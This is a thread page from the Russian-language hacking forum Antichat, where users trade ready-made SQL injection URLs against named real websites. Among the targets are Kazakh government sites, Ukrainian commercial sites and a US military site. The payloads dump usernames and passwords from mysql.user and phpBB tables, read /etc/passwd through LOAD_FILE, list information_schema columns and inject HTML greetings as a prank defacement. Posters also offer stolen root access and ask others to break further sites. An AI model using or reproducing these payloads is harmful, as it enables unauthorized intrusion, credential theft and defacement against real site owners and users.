ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 29.12.2006, 14:37
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,AES_DECRYPT(AES_ENC RYPT(DATABASE(),0x71),0x71),6,7,8/*
 
Ответить с цитированием

  #192  
Старый 29.12.2006, 14:47
Аватар для Slon
Slon
Участник форума
Регистрация: 09.12.2005
Сообщений: 162
Провел на форуме:
701592

Репутация: 91
По умолчанию

http://www.auzr.kz/index.php?n=76-1
http://www.mit.kz/index.php?p=rofl&id_mm=3&act=2-1
http://www.sana.gov.kz/showarticle.php?lang=rus&id=-2 UNION SELECT 1,2,3,4,5,6,7,8/*
http://www.minagri.kz/news.jsp?param=rus&type=notices&noticeId=2725-1
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1%20UNION%20SELECT%201,2,3,ascii(substring(passwor d,1,1)),5,6,7,8,9+from+mysql.user/*

 
Ответить с цитированием

  #193  
Старый 29.12.2006, 15:04
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

http://www.politeh.info/polls.php?id=7'+union+select+*+from+users/*

2 blaga
 
Ответить с цитированием

Sql-injection как способ поздравить с НГ
  #194  
Старый 30.12.2006, 01:16
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию Sql-injection как способ поздравить с НГ

Вот от меня пару поздравлений в виде скулей

Цитата:
http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,char(60,104,49,62,71,111,117,1 00,105,110,105,32,239,238,231,228,240,224,226,235, 255,229,242,32,226,241,229,245,32,224,247,224,242, 238,226,246,229,226,32,241,32,205,195,60,47,104,49 ,62),null,null,null,null,null,null+from+users/*
[screen]
Цитата:
http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+char(60,104,49,62,200,32,242,229,22 5,255,32,247,243,226,224,234,32,241,32,205,238,226 ,251,236,32,195,238,228,238,236,32,41,41,60,47,104 ,49,62),char(60,104,49,62,71,111,117,100,105,110,1 05,60,47,104,49,62)/*
[screen]

_http://gaga.phpnet.us/toolz/chr.php
P.S. форум вставляет пробелы

Последний раз редактировалось Goudini; 30.12.2006 в 01:38..
 
Ответить с цитированием

  #195  
Старый 30.12.2006, 10:35
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Спасибо, тебя тожеhttp://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,concat(nickname,char(58),passw ord,char(32,32,32,32,209,239,224,241,232,225,238,3 3,32,32,71,111,117,100,105,110,105)),null,null,nul l,null,null,null+from+users+limit+1,2/*
 
Ответить с цитированием

sec.ru
  #196  
Старый 30.12.2006, 19:47
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию sec.ru

вот вам нипохек на сек.ру... оракл =\
http://catalog.sec.ru/catalogmgr.cfm?rub=99999'
кто хек раздолбит, пусть отчет кинет в 108117...
 
Ответить с цитированием

  #197  
Старый 01.01.2007, 22:12
Аватар для rem
rem
Новичок
Регистрация: 10.11.2006
Сообщений: 24
Провел на форуме:
59656

Репутация: 17
По умолчанию

Blink: http://www.usfk.mil/USFK/contents/viewNews.asp?id=418'
 
Ответить с цитированием

  #198  
Старый 02.01.2007, 00:21
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://top.ucoz.info/ucozCounter.php5?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1234 56,15,16,17,18/*
ucoz
 
Ответить с цитированием

  #199  
Старый 02.01.2007, 00:38
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,concat(username,':',user_passw ord),4,5+from+forum.phpbb_users+where+user_icq%3E1 1111%20and%20user_icq%3C99999999/*

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,LOAD_FILE(0x2f6574632f70617373 7764),4,5/*

http://www.freetime.com.ua/1891/?raz=-99+union+select+1,2,concat(user,0x3a,password),4,5 +from+mysql.user/*

(mysql root прилагается)
Юзайте на здоровье
 
Ответить с цитированием

  #200  
Старый 02.01.2007, 13:04
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Это список всех колонок базы данных с
_http://www.goverla-tour.com.ua, но я не могу найти там
данные о пользователях, регистрация на сайте есть точно, посмотрите кому не лень, а то я запарился...

_http://www.goverla-tour.com.ua/country.php?countr_id=14+UNION+SELECT+1,2,table_na me,4,5,6,7,8,9+from+information_schema.tables/*

P.S. Похоже автоизация не работает, но можетчего полезное можно вытащить?

Код:
               :: CHARACTER_SET_NAME
:: DEFAULT_COLLATE_NAME
:: DESCRIPTION
:: MAXLEN
:: COLLATION_NAME
:: ID
:: IS_DEFAULT
:: IS_COMPILED
:: SORTLEN
:: TABLE_CATALOG
:: TABLE_SCHEMA
:: TABLE_NAME
:: COLUMN_NAME
:: ORDINAL_POSITION
:: COLUMN_DEFAULT
:: IS_NULLABLE
:: DATA_TYPE
:: CHARACTER_MAXIMUM_LENGTH
:: CHARACTER_OCTET_LENGTH
:: NUMERIC_PRECISION
:: NUMERIC_SCALE
:: COLUMN_TYPE
:: COLUMN_KEY
:: EXTRA
:: PRIVILEGES
:: COLUMN_COMMENT
:: GRANTEE
:: PRIVILEGE_TYPE
:: IS_GRANTABLE
:: CONSTRAINT_CATALOG
:: CONSTRAINT_SCHEMA
:: CONSTRAINT_NAME
:: POSITION_IN_UNIQUE_CONSTRAINT
:: REFERENCED_TABLE_SCHEMA
:: REFERENCED_TABLE_NAME
:: REFERENCED_COLUMN_NAME
:: SPECIFIC_NAME
:: ROUTINE_CATALOG
:: ROUTINE_SCHEMA
:: ROUTINE_NAME
:: ROUTINE_TYPE
:: DTD_IDENTIFIER
:: ROUTINE_BODY
:: ROUTINE_DEFINITION
:: EXTERNAL_NAME
:: EXTERNAL_LANGUAGE
:: PARAMETER_STYLE
:: IS_DETERMINISTIC
:: SQL_DATA_ACCESS
:: SQL_PATH
:: SECURITY_TYPE
:: CREATED
:: LAST_ALTERED
:: SQL_MODE
:: ROUTINE_COMMENT
:: DEFINER
:: CATALOG_NAME
:: SCHEMA_NAME
:: DEFAULT_CHARACTER_SET_NAME
:: DEFAULT_COLLATION_NAME
:: NON_UNIQUE
:: INDEX_SCHEMA
:: INDEX_NAME
:: SEQ_IN_INDEX
:: COLLATION
:: CARDINALITY
:: SUB_PART
:: PACKED
:: NULLABLE
:: INDEX_TYPE
:: COMMENT
:: TABLE_TYPE
:: ENGINE
:: VERSION
:: ROW_FORMAT
:: TABLE_ROWS
:: AVG_ROW_LENGTH
:: DATA_LENGTH
:: MAX_DATA_LENGTH
:: INDEX_LENGTH
:: DATA_FREE
:: AUTO_INCREMENT
:: CREATE_TIME
:: UPDATE_TIME
:: CHECK_TIME
:: TABLE_COLLATION
:: CHECKSUM
:: CREATE_OPTIONS
:: TABLE_COMMENT
:: CONSTRAINT_TYPE
:: TRIGGER_CATALOG
:: TRIGGER_SCHEMA
:: TRIGGER_NAME
:: EVENT_MANIPULATION
:: EVENT_OBJECT_CATALOG
:: EVENT_OBJECT_SCHEMA
:: EVENT_OBJECT_TABLE
:: ACTION_ORDER
:: ACTION_CONDITION
:: ACTION_STATEMENT
:: ACTION_ORIENTATION
:: ACTION_TIMING
:: ACTION_REFERENCE_OLD_TABLE
:: ACTION_REFERENCE_NEW_TABLE
:: ACTION_REFERENCE_OLD_ROW
:: ACTION_REFERENCE_NEW_ROW
:: VIEW_DEFINITION
:: CHECK_OPTION
:: IS_UPDATABLE
:: app_id
:: countr_id
:: curort_id
:: app_name
:: app_plase
:: app_in
:: app_beach
:: app_razvl
:: app_teritory
:: app_img_num
:: app_img_ot
:: app_img_beach
:: tur_id
:: tur_name
:: tur_date
:: tur_path
:: tur_cntr_id
:: countr_name
:: full_name
:: naselen
:: area
:: klimat
:: religy
:: time
:: jazik
:: valuta
:: viza
:: customs
:: hotel
:: call_phone
:: auto
:: transport
:: medicin
:: osobennosti
:: big_img_file
:: click
:: curort_name
:: curort_txt
:: curort_txt1
:: curort_txt2
:: curort_img1
:: curort_img2
:: curort_img_3 _ о курорте
:: dict_id
:: substr
:: text
:: email_id
:: e_mail
:: date
:: eks_id
:: eks_name
:: eks_data
:: eks_path
:: eks_cntr_id
:: hot_id
:: hot_name
:: hot_date
:: hot_path
:: hot_cntr_id
:: id_img
:: path
:: flag
:: news_id
:: news_name
:: news_txt
:: news_img
:: file
:: file_name
:: part_id
:: part_name
:: part_patch
:: part_img
:: termin_id
:: term_name
:: term_opi

Последний раз редактировалось Termin@L; 02.01.2007 в 13:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ